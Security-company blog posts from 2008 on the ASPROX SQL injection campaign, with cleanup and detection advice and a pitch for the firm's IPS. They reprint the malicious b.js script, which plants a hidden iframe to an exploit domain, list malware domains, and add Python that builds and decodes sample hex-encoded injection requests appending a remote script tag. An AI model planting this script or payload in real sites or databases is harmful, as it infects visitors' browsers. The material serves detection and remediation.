Monday, June 30, 2008

ASPROX SQL Compromised my website, now what?

Many people are calling and emailing us for information about ASPROX, and one thing most of them seem unaware of is how an infected website affects its visitors.

So I will walk you through what happens:

Once your ASP website is compromised by the ASPROX SQL injection, you are hosting malware. A malicious piece of JavaScript, "b.js", is loaded from one of the domains listed in my previous posts. The script sets a marker cookie (an "asprox was here" flag, so that a given browser is only hit once per expiry period) and then opens a hidden, zero-pixel iframe from yet another bad domain, which is "the malware can of worms". These domains constantly rotate their IPs (to stay ahead of blocklisting) using fast-flux DNS.

Here are the sample contents of the javascript (b.js):

window.status = "";                       // blank the browser status bar so nothing shows
var cookieString = document.cookie;
var start = cookieString.indexOf("updatebng=");
if (start != -1) {
    // the marker cookie is already present: this visitor was served recently, do nothing
} else {
    // set a marker cookie that expires in 12 hours (12 * 60 * 60 * 1000 ms)
    var expires = new Date();
    expires.setTime(expires.getTime() + 12 * 1 * 60 * 60 * 1000);
    document.cookie = "updatebng=update;expires=" + expires.toGMTString();
    try {
        // zero-size, borderless iframe pulls the exploit page from a second domain
        document.write("<iframe src=http://supbnr.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>");
    } catch (e) {
        // any error is swallowed so the page looks normal to the visitor
    }
}


The malware can vary but is typically a mishmash of exploits targeting several recent browser-based vulnerabilities in QuickTime, Adobe Reader, Flash and even AOL Instant Messenger. Once a vulnerable client visits your site the malware loads successfully and the machine not only becomes a zombie within the ASPROX botnet (the same hosts that attacked your webserver), it also receives various nefarious programs such as a password stealer that defrauds you of your online accounts. Infected clients have also been reported sending out bank phishing emails.

So, in short, for those who are not so technical...

If you have a website infected with ASPROX that has not been cleaned, updated and secured, your website is infecting and spreading malware to anyone who simply views it in their browser.



That means you have an obligation to address this problem immediately! Please contact us for the information packet on ASPROX defense today.

Thursday, June 26, 2008

ASPROX SQL Injection Attacks cont.

ASPROX continues to ravage the web, please contact us for the information packet we put together with defense suggestions.

New ASPROX malware domains: app52.com, appid37.com, apps84.com, asp27.com, asp72.com, script46.com, ssl39.com, st212.com, cid26.com, dl251.com, getbwd.com, asp707.com, aspssl63.com, aspx49.com, batch29.com, bin963.com, bios47.com, hlpgetw.com, lang34.com, update34.com, westpacsecuresite.com

Monday, June 23, 2008

ASPROX SQL Injection Botnet and iFrame/Malware

We first noticed this attack when one of our larger clients saw a barrage of SQL injection alerts in their Sentinel IPS report (6,000 in one week). We looked into it and found an extremely clever attack which hides the SQL injection payload in a hexadecimal string so that the SQL keywords an IDS/IPS signature looks for never appear in the clear. Our device caught the attack at the initial injection stage, the request that carries the encoded string, so the hex evasion portion of the attack failed.

So what is the good news? Sentinel IPS, our managed security product, protects against this attack before it even reaches your webserver by catching the initial SQL injection. This means immediate protection from this ASP/SQL injection threat without having to rewrite your ASP code overnight. The injectable code still has to be fixed (parameterized queries instead of SQL built from request strings); the IPS buys you the time to do it properly.
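As an added illustration of the hex-encoded injection described above (my own example, not code from the original post or from the Sentinel IPS product), the following Python decodes the CAST(0x... AS VARCHAR) wrapper that such requests carry and flags any decoded statement that injects a script tag. The request lines and the encoded UPDATE statement are constructed for this demonstration; the DECLARE/CAST/EXEC wrapper shape and the NVARCHAR (UTF-16LE) variant are my assumptions about how the payload arrives, not details taken from the post.

```python
import re
from urllib.parse import quote, unquote

# Matches CAST(0x<hex> AS VARCHAR(n)) / NVARCHAR(n) / CHAR(n) once the request is
# URL-decoded. Only this wrapper is visible in the clear; the SQL keywords a
# signature would look for are inside the hex string. (Assumed wrapper shape.)
HEX_CAST_RE = re.compile(
    r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?VARCHAR|N?CHAR)\s*(?:\(\s*(?:\d+|MAX)\s*\))?\s*\)",
    re.IGNORECASE,
)
SCRIPT_TAG_RE = re.compile(r"<script\b", re.IGNORECASE)


def decode_hex_casts(request_line):
    """Return the decoded text of every CAST(0x... AS ...) in one log/request line."""
    text = unquote(request_line)  # IIS logs and proxies usually keep the line URL-encoded
    decoded = []
    for m in HEX_CAST_RE.finditer(text):
        hexstr, sqltype = m.group(1), m.group(2).upper()
        if len(hexstr) % 2:
            # A log field limit can truncate the payload mid-byte; decode the whole bytes.
            hexstr = hexstr[:-1]
        raw = bytes.fromhex(hexstr)
        # NVARCHAR is UTF-16LE on SQL Server; VARCHAR/CHAR are single-byte.
        if sqltype.startswith("N"):
            decoded.append(raw.decode("utf-16-le", "replace"))
        else:
            decoded.append(raw.decode("latin-1"))
    return decoded


def find_injections(lines):
    """Return (line number, decoded SQL, injects_script) for every hex-wrapped statement."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        for sql in decode_hex_casts(line):
            hits.append((lineno, sql, bool(SCRIPT_TAG_RE.search(sql))))
    return hits


# --- constructed sample data (not real traffic) ---------------------------------
# What a decoded statement of this kind looks like: append a script tag to a text column.
SAMPLE_SQL = ("UPDATE [news] SET [body]=RTRIM(CONVERT(VARCHAR(4000),[body]))"
              "+'<script src=http://nihaorr1.com/b.js></script>'")
VARCHAR_HEX = SAMPLE_SQL.encode("latin-1").hex().upper()
NVARCHAR_HEX = SAMPLE_SQL.encode("utf-16-le").hex().upper()


def build_request(hexstr, sqltype):
    """Build a URL-encoded GET line carrying the wrapper, as it would reach the server."""
    tail = f"DECLARE @S {sqltype}(4000);SET @S=CAST(0x{hexstr} AS {sqltype}(4000));EXEC(@S);--"
    return f"GET /news.asp?id=1;{quote(tail)} HTTP/1.1"


SAMPLE_LOG = [
    "GET /news.asp?id=1 HTTP/1.1",              # benign request
    build_request(VARCHAR_HEX, "VARCHAR"),      # single-byte payload
    build_request(NVARCHAR_HEX, "NVARCHAR"),    # UTF-16LE payload
    "GET /news.asp?id=2 HTTP/1.1",
]

if __name__ == "__main__":
    for lineno, sql, injects in find_injections(SAMPLE_LOG):
        print(f"line {lineno}: injects script tag={injects}\n  {sql}")
```

Run it over the request field of your IIS logs to see which tables and columns the decoded statements touched; that tells you where the injected script tags now live and what has to be cleaned, independent of whether the IPS blocked later attempts.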

Grab our ASPROX toolkit for information on cleaning and defending from this attack.


***UPDATE*** I met with the Dallas US Secret Service office today, and this issue is much more widespread than we previously thought. We want to help, so if you have any information for us or need assistance cleaning up this mess, give us a call.

How do you know if your site was compromised? Check your ASP application in your browser by viewing the page source and looking for a script tag that loads JavaScript from, or an iframe that points at, any of the following domains:

***UPDATE*** It may be faster to search the source for the string "/b.js".

nihaorr1.com, free.hostpinoy.info, xprmn4u.info, nmidahena.com, winzipices.cn, sb.5252.ws, aspder.com, 11910.net, bbs.jueduizuan.com, bluell.cn, 2117966.net, s.see9.us, xvgaoke.cn, 1.hao929.cn, 414151.com, cc.18dd.net, yl18.net, kisswow.com.cn, urkb.net, c.uc8010.com, rnmb.net, ririwow.cn, killwow1.cn, xiaobaishan.net, qiqigm.com, wowgm1.cn, wowyeye.cn, 9i5t.cn, c11.8866.org, computershello.cn, tlcn.net, z008.net, b15.3322.org, qiqicc.cn, direct84.com, heihei117.cn, caocaowow.cn, qiuxuegm.com, locale48.com, firestnamestea.cn, fami4ka.net, redir94.com, rexec39.com, en-us18.com, ck1.in, adjuncnet.com, rundll92.com, sysid72.com, n.uc8010.com, libid53.com, qiqi111.cn, heartgames.cn, logid83.com, datajto.com, adw95.com, tjwh202.162.ns98.cn, jetadwor.com, cookieadw.com, bannerupd.com, nb88.cn, bigadnet.com, 1.cool0.biz, updatebnr.com, flyzhu.9966.org, sslnet72.com, advertbnr.com, script46.com, fengnima.cn, tag58.com, banner82.com, smeisp.cn, hoursebuilds.cn, hyperadw.com, adsitelo.com, okey123.cn, b.kaobt.cn, getadw.com, nihao112.com, al.99.vc, aidushu.net, a.13175.com, chliyi.com, free.edivid.info, 52-o.cn, fucksb.net, 0.actualization.cn, d39.6600.org, h28.8800.org, 001yl.com, ucmal.com, t.uc8010.com, dota11.cn, pingbnr.com, bnrcompro.com, y66.us, m11.3322.org, bc0.cn, clsidw.com, adword71.com, killpp.cn, bnradw.com, cmiia.com, sslput4.com, exe94.com, bnrcntrl.com, w11.6600.org, usuc.us, hlpadw.com, jumpbnr.com, advabnr.com, siteid38.com, msshamof.com, refer68.com, newasp.com.cn, wowgm2.cn, mm.jsjwh.com.cn, updatead.com, win496.com, view89.com, 17ge.cn, err68.com, upgradead.com, adword72.com, kk6.us, clickbnr.com, 117275.cn, c23.2288.org, encode72.com, exec51.com, pingadw.com, vb008.cn, wow112.cn, nihaoel3.com, p060523.info, o7n9.cn, rundll841.com, jetdbs.com, dbdomaine.com, domaincld.com, clsiduser.com, heiheinn.cn, coldwop.com, alzhead.com, chinabnr.com, adwbnr.com, chkbnr.com, chkadw.com
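The view-source check above can be automated. The following Python is an added example (my own, not part of the original post) that scans saved page source for script or iframe src attributes pointing at a known ASPROX domain, or at any /b.js, which also catches domains that have not made the list yet. The sample markup is constructed; the KNOWN_BAD_DOMAINS set holds only a handful of entries from the lists on this page and should be replaced with the full list when you run it for real.

```python
import re
from urllib.parse import urlsplit

# A few entries from the domain lists on this page; load the full list for a real scan.
KNOWN_BAD_DOMAINS = {"nihaorr1.com", "supbnr.com", "winzipices.cn", "direct84.com", "update34.com"}

# The injected tags are usually unquoted and appended inside other text, so match
# the raw markup (what "view source" shows) rather than parsing a tidy DOM.
SRC_TAG_RE = re.compile(r"<(script|iframe)\b[^>]*?\ssrc\s*=\s*[\"']?([^\"'\s>]+)", re.IGNORECASE)


def host_of(url):
    """Hostname of a URL as written in markup; '' for a same-site relative path."""
    if url.startswith("//"):
        url = "http:" + url
    elif "://" not in url:
        return ""
    return (urlsplit(url).hostname or "").lower()


def is_bad_host(host, bad_domains):
    """True if host is a listed domain or a subdomain of one."""
    return any(host == d or host.endswith("." + d) for d in bad_domains)


def suspicious_references(html, bad_domains=KNOWN_BAD_DOMAINS):
    """Return (tag, url, reasons) for every script/iframe src that warrants a look."""
    hits = []
    for m in SRC_TAG_RE.finditer(html):
        tag, url = m.group(1).lower(), m.group(2)
        reasons = []
        if is_bad_host(host_of(url), bad_domains):
            reasons.append("known ASPROX domain")
        if urlsplit(url).path.lower().endswith("/b.js"):
            reasons.append("loads /b.js")  # flags rotated domains not yet on the list
        if reasons:
            hits.append((tag, url, reasons))
    return hits


def scan_files(paths, bad_domains=KNOWN_BAD_DOMAINS):
    """Scan saved page sources on disk; returns {path: hits} for files with findings."""
    report = {}
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as f:
            hits = suspicious_references(f.read(), bad_domains)
        if hits:
            report[path] = hits
    return report


# Constructed sample page source: one legitimate script, two injected script tags
# (one on a listed domain, one on a domain not yet listed) and the hidden iframe.
SAMPLE_SOURCE = """<html><head>
<script type="text/javascript" src="/js/site.js"></script>
</head><body>
<p>Latest news<script src=http://nihaorr1.com/b.js></script></p>
<p>Contact<script src=http://some-new-host.example/b.js></script></p>
<iframe src=http://supbnr.com/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>
</body></html>"""

if __name__ == "__main__":
    for tag, url, reasons in suspicious_references(SAMPLE_SOURCE):
        print(f"{tag:6} {url}  <- {', '.join(reasons)}")
```

Scan the pages as the server actually delivers them (save the rendered output, not just the .asp templates): the injected tag lives in the database text the pages display, so a clean template can still serve an infected page. One hit on any page means every text column that feeds the site needs the same check and cleanup.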